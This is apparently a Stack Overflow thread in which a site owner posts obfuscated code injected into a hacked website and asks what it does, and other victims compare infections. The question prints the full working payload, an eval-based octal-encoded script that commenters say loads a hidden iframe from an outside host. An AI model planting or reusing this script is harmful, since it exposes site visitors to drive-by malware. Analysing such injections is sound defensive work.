# Code injected into compromised site

Tags: javascript, code-injection

We had one of our websites compromised over the weekend, the following code was injected into the site. I'm trying to identify the function of the code.

```
>#0c0896#                                              
echo "<scripttype=\"text/javascript\"language=\"javascript\">  
asd=function(){d.body++};a=(\"44,152,171,162,147,170,155,163,162,44,176,176,176,152,152,152,54,55,44,177,21,16,44,172,145,166,44,176,174,162,44,101,44,150,163,147,171,161,151,162,170,62,147,166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,53,55,77,21,16,21,16,44,176,174,162,62,167,166,147,44,101,44,53,154,170,170,164,76,63,63,170,147,154,163,164,164,62,167,170,145,166,170,160,163,153,155,147,62,147,163,161,63,147,167,167,63,147,163,171,162,170,151,166,62,164,154,164,53,77,21,16,44,176,174,162,62,167,170,175,160,151,62,164,163,167,155,170,155,163,162,44,101,44,53,145,146,167,163,160,171,170,151,53,77,21,16,44,176,174,162,62,167,170,175,160,151,62,146,163,166,150,151,166,44,101,44,53,64,53,77,21,16,44,176,174,162,62,167,170,175,160,151,62,154,151,155,153,154,170,44,101,44,53,65,164,174,53,77,21,16,44,176,174,162,62,167,170,175,160,151,62,173,155,150,170,154,44,101,44,53,65,164,174,53,77,21,16,44,176,174,162,62,167,170,175,160,151,62,160,151,152,170,44,101,44,53,65,164,174,53,77,21,16,44,176,174,162,62,167,170,175,160,151,62,170,163,164,44,101,44,53,65,164,174,53,77,21,16,21,16,44,155,152,44,54,45,150,163,147,171,161,151,162,170,62,153,151,170,111,160,151,161,151,162,170,106,175,115,150,54,53,176,174,162,53,55,55,44,177,21,16,44,150,163,147,171,161,151,162,170,62,173,166,155,170,151,54,53,100,150,155,172,44,155,150,101,140,53,176,174,162,140,53,102,100,63,150,155,172,102,53,55,77,21,16,44,150,163,147,171,161,151,162,170,62,153,151,170,111,160,151,161,151,162,170,106,175,115,150,54,53,176,174,162,53,55,62,145,164,164,151,162,150,107,154,155,160,150,54,176,174,162,55,77,21,16,44,201,21,16,201,21,16,152,171,162,147,170,155,163,162,44,127,151,170,107,163,163,157,155,151,54,147,163,163,157,155,151,122,145,161,151,60,147,163,163,157,155,151,132,145,160,171,151,60,162,110,145,175,167,60,164,145,170,154,55,44,177,21,16,44,172,145,166,44,170,163,150,145,175,44,101,44,162,151,173,44,110,145,170,151,54,55,77,21,16,44,172,145,166,44,151,174,164,155,166,151,44,101,44,162,151,173,44,110,145,170,151,54,55,77,21,16,44,155,152,44,54,162,110,145,175,167,101,101,162,171,160,160,44,200,200,44,162,110,145,175,167,101,101,64,55,44,162,110,145,175,167,101,65,77,21,16,44,151,174,164,155,166,151,62,167,151,170,130,155,161,151,54,170,163,150,145,175,62,153,151,170,130,155,161,151,54,55,44,57,44,67,72,64,64,64,64,64,56,66,70,56,162,110,145,175,167,55,77,21,16,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,44,101,44,147,163,163,157,155,151,122,145,161,151,57,46,101,46,57,151,167,147,145,164,151,54,147,163,163,157,155,151,132,145,160,171,151,55,21,16,44,57,44,46,77,151,174,164,155,166,151,167,101,46,44,57,44,151,174,164,155,166,151,62,170,163,113,121,130,127,170,166,155,162,153,54,55,44,57,44,54,54,164,145,170,154,55,44,103,44,46,77,44,164,145,170,154,101,46,44,57,44,164,145,170,154,44,76,44,46,46,55,77,21,16,201,21,16,152,171,162,147,170,155,163,162,44,113,151,170,107,163,163,157,155,151,54,44,162,145,161,151,44,55,44,177,21,16,44,172,145,166,44,167,170,145,166,170,44,101,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,155,162,150,151,174,123,152,54,44,162,145,161,151,44,57,44,46,101,46,44,55,77,21,16,44,172,145,166,44,160,151,162,44,101,44,167,170,145,166,170,44,57,44,162,145,161,151,62,160,151,162,153,170,154,44,57,44,65,77,21,16,44,155,152,44,54,44,54,44,45,167,170,145,166,170,44,55,44,52,52,21,16,44,54,44,162,145,161,151,44,45,101,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,167,171,146,167,170,166,155,162,153,54,44,64,60,44,162,145,161,151,62,160,151,162,153,170,154,44,55,44,55,44,55,21,16,44,177,21,16,44,166,151,170,171,166,162,44,162,171,160,160,77,21,16,44,201,21,16,44,155,152,44,54,44,167,170,145,166,170,44,101,101,44,61,65,44,55,44,166,151,170,171,166,162,44,162,171,160,160,77,21,16,44,172,145,166,44,151,162,150,44,101,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,155,162,150,151,174,123,152,54,44,46,77,46,60,44,160,151,162,44,55,77,21,16,44,155,152,44,54,44,151,162,150,44,101,101,44,61,65,44,55,44,151,162,150,44,101,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,160,151,162,153,170,154,77,21,16,44,166,151,170,171,166,162,44,171,162,151,167,147,145,164,151,54,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,167,171,146,167,170,166,155,162,153,54,44,160,151,162,60,44,151,162,150,44,55,44,55,77,21,16,201,21,16,155,152,44,54,162,145,172,155,153,145,170,163,166,62,147,163,163,157,155,151,111,162,145,146,160,151,150,55,21,16,177,21,16,155,152,54,113,151,170,107,163,163,157,155,151,54,53,172,155,167,155,170,151,150,143,171,165,53,55,101,101,71,71,55,177,201,151,160,167,151,177,127,151,170,107,163,163,157,155,151,54,53,172,155,167,155,170,151,150,143,171,165,53,60,44,53,71,71,53,60,44,53,65,53,60,44,53,63,53,55,77,21,16,21,16,176,176,176,152,152,152,54,55,77,21,16,201,21,16,201,21,16\"[\"split\"](\",\"));ss=String;d=document;for(i=0;i<a.length;i+=1){a[i]=-(7-3)+parseInt(a[i],8);}try{asd()}catch(q){zz=0;}try{zz^=2}catch(q){zz=1;}if(!zz)if(window[\"document\"])eval(ss.fromCharCode.apply(ss,a));</script>";

>#/0c0896#
?>
```

Thanks for any insight.

Comment: Questions like these are offtopic on SO @Layke

Comment: Sorry. Yeah, you are right. It is the wrong exchange site.

Comment: Matt, if you reformat your question as per guidelines, or repost on (I'm guessing ServerFault?)...

http://meta.stackexchange.com/questions/79133/are-what-does-this-code-do-questions-on-topic-at-stackoverflow

Comment: finding out what a javascipt injection hack is doing doesnt belong on serverfault either... This one is too advanced for me to figure out on my own, which is why I came here. Any search for anything to do with that code, only brings up other sites that are infected.

Comment: Yeah. That's all I could find too. I've just had to fix a few dozen sites. I have no idea how they got hacked either. Different servers. They were all compromised via FTP access. But they weren't bruteforced, and the passwords well all different on 3 different servers. I think it was a trojan/virus, that perhaps an employee downloaded via some NULLED software or something. I went through lots of access logs and could only find legitamate access through FTP and no failed attempts. It was very odd...

Comment: I have this problem too. Maybe we could find some similarities to spot a problem? I dont host the site myself (its a cheap php host) so I cannot see if the server is infected. It only seems to appear in HTML and PHP files with html blocks. After the code is injected, the browser does not allow to show it. I use Notepad++ NppFTP for FTP access and I have an Ipad app called code-everywhere, these are the only apps who know the login/pass of the FTP.

Comment: On my end, there was an abnormal ammount of intrusion attempts the day the infection happened, 10x the norm. But still not enough to bruteforce it. This was a unused, out of date Joomla site, could it be a Joomla exploit? I'm hosting on Azure.

Comment: I reversed the code, this the code that is injected: https://gist.github.com/markknol/5701402
When I follow the link that is tried to called in the iframe it leads to http://www.lan2wave.com/161e8fdc56f715bb/z.php which ends dead.

Comment: BTW i don't use any CMS system on my site it is a normal handcrafted website.

Comment: Maybe it's some virus on your system Mark"? That's what we are putting it down to...It all started kicking off on May 27th and again on May 29th for us. There was also a large amount of traffic on one server. About 5Gb worth of traffic, when usually it would be like 20Mb daily. For me, the strangest thing is that a completely idle VPS was compromised, that hadn't been access in years.

Comment: Also, it was only a few sites which were compromised. Not all of them... the person who runs the sites which were compromised on my VPS  also had other sites compromised on a few other servers.

Comment: Actually this was a GoDaddy hosted site... I dont know much about it, I'm just decommisioning it.

Comment: @MarkKnol how were you able to reverse the code?

Comment: i cleaned up the code, and replaced eval with console.log, see here: https://gist.github.com/markknol/5701604

Comment: I found this thread as one my client's sites got hacked with a very similar code injection over the weekend. But in ours, the iFrame SRC goes to a different URL, and in addition we had our htaccess file modified to redirect elsewhere.